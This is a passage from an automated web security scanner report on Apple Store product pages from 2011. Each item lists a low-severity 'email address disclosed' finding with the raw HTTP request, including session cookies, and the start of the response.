ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 18:06:49 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 18:18:31 GMT
content-type: text/html; charset=UTF-8; encoding=UTF8
ETag: "3b94b67ef1d421e9dd851159c4622a60"
Vary: accept-encoding
Date: Thu, 03 Feb 2011 18:08:31 GMT
x-request-id: 17376cc7-f1ed-446c-89e4-12c4a066e498
Content-Length: 93984
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />


<title>Griffin WindowSeat HandsFree for iPhone and iPod - Apple Sto
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.40. http://store.apple.com/us/product/H0884ZM/A  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/product/H0884ZM/A

Issue detail

The following email address was disclosed in the response:

Request

GET /us/product/H0884ZM/A HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 18:06:37 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 18:18:16 GMT
ETag: "313d7c5ce42e0193727b9c1b50faa7a1"
Vary: accept-encoding
content-type: text/html; charset=UTF-8; encoding=UTF8
Date: Thu, 03 Feb 2011 18:08:16 GMT
x-request-id: 6d85aabb-cf96-4a17-926e-6dac824b6cfe
Content-Length: 105878
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />


<title>Magellan Premium Car Kit for iPhone and iPod touch - Apple S
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.41. http://store.apple.com/us/product/H0997  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/product/H0997

Issue detail

The following email address was disclosed in the response:

Request

GET /us/product/H0997 HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 18:06:13 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 18:17:45 GMT
ETag: "f42307ba8d87d9da9d0044b19c2b49e1"
Vary: accept-encoding
content-type: text/html; charset=UTF-8; encoding=UTF8
Date: Thu, 03 Feb 2011 18:07:45 GMT
x-request-id: eac81cdb-80ef-4d0e-a30d-9726060097a9
Content-Length: 99881
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />


<title>Scosche IDR355md Increased Dynamic Range Noise Isolating Ear
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.42. http://store.apple.com/us/product/H1411  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/product/H1411

Issue detail

The following email address was disclosed in the response:

Request

GET /us/product/H1411 HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 18:06:04 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 18:17:27 GMT
ETag: "cffa06b4273834eb0901a7e1e7a12b75"
Vary: accept-encoding
content-type: text/html; charset=UTF-8; encoding=UTF8
Date: Thu, 03 Feb 2011 18:07:27 GMT
x-request-id: e1b4ab7c-d59c-4ce2-bd81-41e54c38d7d6
Content-Length: 90557
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />


<title>Epson Stylus NX420 All-in-One Printer - Apple Store (U.S.)</
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.43. http://store.apple.com/us/product/H1549  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/product/H1549

Issue detail

The following email address was disclosed in the response:

Request

GET /us/product/H1549 HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 18:06:10 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 18:17:36 GMT
content-type: text/html; charset=UTF-8; encoding=UTF8
ETag: "dae8a38c74bf5985a9f0c51dc4235d10"
Vary: accept-encoding
Date: Thu, 03 Feb 2011 18:07:36 GMT
x-request-id: 2a88066a-e986-452a-bb9d-964d1c90fd56
Content-Length: 101041
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />


<title>Philips Fidelio DS7550 Portable Speaker Dock - Apple Store (
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.44. http://store.apple.com/us/product/H1663  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/product/H1663

Issue detail

The following email address was disclosed in the response:

Request

GET /us/product/H1663 HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 18:06:08 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 18:17:31 GMT
content-type: text/html; charset=UTF-8; encoding=UTF8
ETag: "beb90df6d4d36aab23ac9e65544efa05"
Vary: accept-encoding
Date: Thu, 03 Feb 2011 18:07:31 GMT
x-request-id: b8fa6330-e254-4681-8af9-736fa049efc7
Content-Length: 99193
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />


<title>Philips DC290 Docking Clock Radio with Remote - Apple Store
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.45. http://store.apple.com/us/product/H1938ZM/A  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/product/H1938ZM/A

Issue detail

The following email address was disclosed in the response:

Request

GET /us/product/H1938ZM/A?fnode=MTY1NDA2MQ&mco=MTk0MjMzNzk HTTP/1.1
Host: store.apple.com
Proxy-Connection: keep-alive
Referer: http://store.apple.com/us/browse/home/shop_ipod/ipod_accessories/car_audio
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; geo=US; s_ria=Flash%2010%7C; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; s_orientation=%5B%5BB%5D%5D; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; s_ppv=60%2C60%2C1012%2C; s_orientationHeight=1012; dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pv=ipod%20-%20accessories%20(us); asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; s_cc=true; s_sq=appleglobal%2Capplestoreww%2Capplestoreus%2Capplestoreusconsum%3D%2526pid%253DAOS%25253A%252520home/shop_ipod/ipod_accessories/car_audio%2526pidt%253D1%2526oid%253Dhttp%25253A//store.apple.com/us/product/H1938ZM/A%25253Ffnode%25253DMTY1NDA2MQ%252526mco%25253DMTk0MjMzNzk%2526ot%253DA%26appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 17:55:29 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 18:08:29 GMT
ETag: "40710f6ad3258dc5b1dab003364827d4"
Vary: accept-encoding
content-type: text/html; charset=UTF-8; encoding=UTF8
Date: Thu, 03 Feb 2011 17:58:29 GMT
x-request-id: 1938ca99-f8ab-4f5f-a9cd-2a46470abae2
x-frame-options: sameorigin
Content-Length: 69740


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />


<title>Griffin DirectDeck Universal Cassette Adapter - Apple Store
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.46. http://store.apple.com/us/product/H2428LL/A  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/product/H2428LL/A

Issue detail

The following email address was disclosed in the response:

Request

GET /us/product/H2428LL/A HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:08:48 GMT
Content-Type: text/html; charset=UTF-8; encoding=UTF8
x-request-id: 219b890f-3036-44d4-b122-b0bc7a899abc
Last-Modified: Thu, 03 Feb 2011 18:07:03 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 18:18:48 GMT
ETag: "fbdcdb2bdd941a44b2c1873116a3004c"
Vary: accept-encoding
Content-Length: 91581
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />


